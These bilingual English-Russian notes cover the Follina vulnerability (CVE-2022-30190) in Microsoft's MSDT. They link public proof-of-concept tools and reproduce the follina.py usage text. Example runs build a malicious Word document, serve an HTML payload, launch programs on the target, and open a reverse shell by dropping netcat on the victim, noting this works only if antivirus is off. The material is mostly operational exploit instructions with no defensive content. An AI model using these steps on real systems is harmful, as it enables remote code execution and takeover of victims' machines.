
Notes related to CVE-2022-30190
Заметки, связанные с CVE-2022-30190
FOLLINA: CVE-2022-30190
Использует средство диагностики поддержки Microsoft (MSDT)
Эксплуатирует окно диагностики, открытое для диагностики, и при правильном выполнении предоставляет обратную оболочку атакующему.
Github: (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py
Благодарности: (a). @_johnhammond (b). @networkchuck
Использование follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help show this help message and exit --command COMMAND, -c COMMAND команда для выполнения на цели (по умолчанию: calc) --output OUTPUT, -o OUTPUT выходной вредоносный файл (по умолчанию: ./follina.doc) --interface INTERFACE, -i INTERFACE сетевой интерфейс или IP-адрес для размещения HTTP-сервера (по умолчанию: eth0) --port PORT, -p PORT порт для HTTP-сервера (по умолчанию: 8000)
Примеры
(a). Запуск calc.exe:
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
(b). Запуск notepad.exe:
$ python3 follina.py -c "notepad"
(c). Получить обратную оболочку на порт 9001.
Примечание: это загружает бинарный файл netcat на жертву и помещает его в C:\Windows\Tasks. Он не удаляет бинарный файл. Это вызовет
срабатывание антивируса, если антивирус не отключен.
$ python3 follina.py -r 9001